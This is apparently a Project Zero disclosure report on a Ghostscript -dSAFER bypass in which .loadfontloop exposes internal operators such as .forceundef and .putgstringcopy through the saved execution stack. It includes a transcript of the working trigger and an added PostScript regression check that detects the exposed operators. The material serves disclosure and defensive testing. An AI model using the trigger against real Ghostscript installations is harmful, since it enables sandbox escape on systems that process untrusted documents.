Ghostscript suffers from an issue where .loadfontloop exposes system operators in the saved execution stack.
ghostscript: .loadfontloop exposes system operators in saved execution stack.
While testing the fix for <a href="/p/project-zero/issues/detail?id=1690" title="ghostscript: $error object can expose system operators in saved execution stack." class="closed_ref" rel="nofollow"> bug 1690 </a>, I found a variation that still works:
$ ./gs -dSAFER -sDEVICE=ppmraw
GPL Ghostscript GIT PRERELEASE 9.26 (2018-09-13)
Copyright (C) 2018 Artifex Software, Inc. All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
GS>systemdict /.loadfontloop get stopped == clear
true
GS>$error /estack get 27 get 18 get 14 get ==
--.forceundef--
GS>
.forceundef alone is bad enough (it removes a dictionary entry regardless of the dictionary's access attributes), but .putgstringcopy is also in there, and it is basically a wrapper around .forceput.
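The transcript above reaches .forceundef through hard-coded indices (27, 18, 14) into the saved execution stack, which only hold for that particular build. As an added regression check that is not part of the original report or of Ghostscript's own test suite, the following PostScript file reproduces the same trigger and then walks everything reachable from $error /estack, reporting any operator whose name starts with "." (Ghostscript's naming convention for internal operators that -dSAFER is meant to keep away from user PostScript). The file name and the dot-prefix heuristic are my choices; the check flags every such operator it can reach, so some of what it reports may be harmless, but under -dSAFER none of them should be reachable at all.

```postscript
%!PS
% Added regression check (not from the original report or from Ghostscript):
% reproduce the transcript's trigger, then walk everything reachable from
% $error /estack and report operators whose names start with "." (the
% Ghostscript convention for internal operators that -dSAFER is supposed
% to keep out of reach). Walking the whole array instead of indexing
% 27/18/14 keeps the check independent of the build.
% Assumed usage (file name is an assumption of this example):
%   gs -q -dSAFER -dNODISPLAY -dBATCH -dNOPAUSE check_estack.ps

/found 0 def

% scan: consume one object; recurse into readable arrays, report internal operators.
/scan {
  dup type /operatortype eq {
    dup 128 string cvs                    % operator -> its name as a string
    dup length 0 gt {
      dup 0 get 46 eq {                   % 46 is the character code of '.'
        (exposed internal operator: ) print print (\n) print
        /found found 1 add def
      } { pop } ifelse
    } { pop } ifelse
    pop
  } {
    dup type dup /arraytype eq exch /packedarraytype eq or {
      % executeonly procedures would raise invalidaccess on forall; rcheck skips them
      dup rcheck { { scan } forall } { pop } ifelse
    } { pop } ifelse
  } ifelse
} bind def

systemdict /.loadfontloop known {
  % Same trigger as the transcript: run .loadfontloop with an empty operand
  % stack so it errors and its execution context is recorded in $error.
  systemdict /.loadfontloop get stopped pop
  clear
  $error /estack known {
    $error /estack get scan
  } if
  found 0 eq {
    (OK: no internal operators reachable via $error /estack\n) print
  } {
    (FAIL: ) print found 10 string cvs print
    ( internal operator\(s\) reachable via $error /estack\n) print
  } ifelse
} {
  (.loadfontloop not defined in this build; nothing to check\n) print
} ifelse
```

On the 9.26 prerelease shown in the transcript the expectation is a FAIL line naming .forceundef and .putgstringcopy among others; on a build where the upstream fix is effective the walk should find no dot-prefixed operators. Arrays that fail rcheck (executeonly procedures) are skipped rather than wrapped in stopped, because an error inside forall would leave the loop's operands on the stack and confuse the walk.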
Filed upstream as <a href="https://bugs.ghostscript.com/show_bug.cgi?id=699938" title="" class="" rel="nofollow">https://bugs.ghostscript.com/show_bug.cgi?id=699938</a>
This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public.
Found by: taviso